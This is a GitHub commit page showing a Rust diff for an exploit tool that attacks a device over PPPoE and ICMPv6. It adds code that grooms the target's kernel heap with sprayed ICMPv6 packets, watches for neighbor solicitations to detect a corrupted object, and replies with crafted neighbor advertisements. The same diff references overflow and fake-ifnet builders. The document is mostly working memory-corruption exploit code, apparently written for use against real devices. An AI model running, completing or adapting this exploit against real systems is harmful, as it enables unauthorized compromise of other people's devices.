Skip to content

Commit

Permalink
Add search for corrupted obj
Browse files Browse the repository at this point in the history
  • Loading branch information
@fedebuonco
fedebuonco committed Oct 16, 2024
1 parent 3def511 commit f3360db
Show file tree
Hide file tree
Showing 3 changed files with 69 additions and 25 deletions.
64 changes: 41 additions & 23 deletions src/exploit/mod.rs
View file
Original file line number Diff line number Diff line change
Expand Up @@ -34,17 +34,18 @@ use packet_checking::{
is_padr_packet,
};

use utils::{create_ethernet_channel, listen_for_packet};
use utils::{create_ethernet_channel, listen_for_corruption, listen_for_packet};

use network_structs::{build_overflow_lle, create_fake_ifnet};

// Public re exports
pub use lcp_echo_handler::LcpEchoHandler;
pub struct Exploit {
pub source_mac: [u8; 6],
pub target_mac: [u8; 6],
pub pppoe_softc: u64,
pub source_mac: [u8; 6],
pub host_uniq: [u8; 8],
pub target_ipv6: [u8; 16],
}

impl Exploit {
Expand Down Expand Up @@ -202,15 +203,15 @@ impl Exploit {
// Wait for the ICMPv6 Router Solicitation packet
println!("[+] Waiting for Router Solicitation packet");
let result = listen_for_packet(rx.as_mut(), is_icmpv6_router_sol, None);
let target_ipv6: [u8; 16] = result.unwrap()[22..38].try_into().unwrap();
println!("[+] Target IPv6 {:?}", target_ipv6);
self.target_ipv6 = result.unwrap()[22..38].try_into().unwrap();
println!("[+] Target IPv6 {:?}", self.target_ipv6);
// Enters grooming loop
spray(
tx.as_mut(),
rx.as_mut(),
self.source_mac,
self.target_mac,
target_ipv6,
self.target_ipv6,
);
println!("[+] Heap grooming...done");
}
Expand Down Expand Up @@ -244,14 +245,26 @@ impl Exploit {
self.lcp_negotiation(interface);
self.ipcp_negotiation(interface);

let mut _corrupted = false;
// let mut _corrupted = search_for_corrupted_obj();
let corrupted_source_ipv6: Option<[u8; 16]> = search_for_corrupted_obj(
tx.as_mut(),
rx.as_mut(),
self.source_mac,
self.target_mac,
self.target_ipv6,
);

if !_corrupted {
println!("[-] Scanning for corrupted object...failed. Please retry the exploit.");
process::exit(1);
match corrupted_source_ipv6 {
Some(source_ipv6) => {
println!(
"[+] Scanning for corrupted object...found {:x?}",
source_ipv6
);
}
None => {
println!("[-] Scanning for corrupted object...failed. Please retry the exploit.");
process::exit(1);
}
}
println!("[+] Scanning for corrupted object...found"); // TODO add the found to the print
}
}

Expand Down Expand Up @@ -321,9 +334,12 @@ fn search_for_corrupted_obj(
source_mac: [u8; 6],
target_mac: [u8; 6],
target_v6: [u8; 16],
) -> bool {
) -> Option<[u8; 16]> {
for i in (0..constants::SPRAY_NUM).rev() {
println!("[+] Heap Grooming at {:?}%", 100 * i / constants::SPRAY_NUM);
println!(
"[+]Search for corrupted object at {:?}%",
100 * i / constants::SPRAY_NUM
);
if i >= constants::HOLE_START && i % constants::HOLE_SPACE == 0 {
println!("[-]HOLE");
continue;
Expand All @@ -337,17 +353,19 @@ fn search_for_corrupted_obj(
let _result = tx
.send_to(icmpv6_req.as_slice(), None)
.expect("[-] Failed to send icmpv6");

let _result = listen_for_packet(rx, is_icmpv6_nd_ns, None);
// self.s.send(
// Ether(src=self.source_mac, dst=self.target_mac) /
// IPv6(src=source_ipv6, dst=self.target_ipv6) /
// ICMPv6ND_NA(tgt=source_ipv6, S=1) /
// ICMPv6NDOptDstLLAddr(lladdr=self.source_mac))

//TODO return corr yes or no
// Listen for packet if echo reply break,else if neighboard solicitation then corrupted
let currupted = listen_for_corruption(rx);
if !currupted {
return None;
}
let icmpv6_adv = create_icmpv6_adv(source_mac, target_mac, source_v6, target_v6);
// Send the request
let _result = tx
.send_to(icmpv6_adv.as_slice(), None)
.expect("[-] Failed to send icmpv6adv");
return Some(source_v6);
}
true
None
}

fn spray(
Expand Down
25 changes: 25 additions & 0 deletions src/exploit/utils.rs
View file
Original file line number Diff line number Diff line change
@@ -1,3 +1,4 @@
use super::packet_checking::{is_icmpv6_echo_reply, is_icmpv6_nd_ns};
use pnet::datalink::Channel::Ethernet;
use pnet::datalink::Config;
use pnet::datalink::{self, DataLinkReceiver, DataLinkSender, NetworkInterface};
Expand Down Expand Up @@ -48,3 +49,27 @@ where
thread::sleep(Duration::from_millis(10));
}
}

pub fn listen_for_corruption(rx: &mut dyn DataLinkReceiver) -> bool {
let timeout = Duration::from_secs(30);
let start_time = Instant::now();
loop {
// Check if timeout has passed
if start_time.elapsed() >= timeout {
return false;
}

match rx.next() {
Ok(packet) => {
if is_icmpv6_echo_reply(packet) {
return false;
} else if is_icmpv6_nd_ns(packet) {
return true;
}
}
Err(e) => {
panic!("An error occurred while reading a packet: {}", e);
}
}
}
}
5 changes: 3 additions & 2 deletions src/main.rs
View file
Original file line number Diff line number Diff line change
Expand Up @@ -15,10 +15,11 @@ fn run_exploit(interface_name: String) {
let interface = interfaces.into_iter().find(interface_names_match).unwrap();
// Exploit
let mut expl = Exploit {
source_mac: [0, 0, 0, 0, 0, 0],
target_mac: [0, 0, 0, 0, 0, 0],
pppoe_softc: 0,
source_mac: [0, 0, 0, 0, 0, 0],
host_uniq: [0, 0, 0, 0, 0, 0, 0, 0],
target_ipv6: [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
};
// LCP
let mut handler = exploit::LcpEchoHandler::new(&interface);
Expand All @@ -28,7 +29,7 @@ fn run_exploit(interface_name: String) {
expl.ppp_negotiation(&interface);
expl.lcp_negotiation(&interface);
expl.ipcp_negotiation(&interface);
println!("[*] Initial Negotiations Done...");
println!("[*] Initial Negotiations Done... Wait for interface to be ready");
println!("[*] Starting Heap Grooming...");
expl.heap_grooming(&interface);
println!("[*] STAGE 1: Memory corruption");
Expand Down

0 comments on commit f3360db

Please sign in to comment.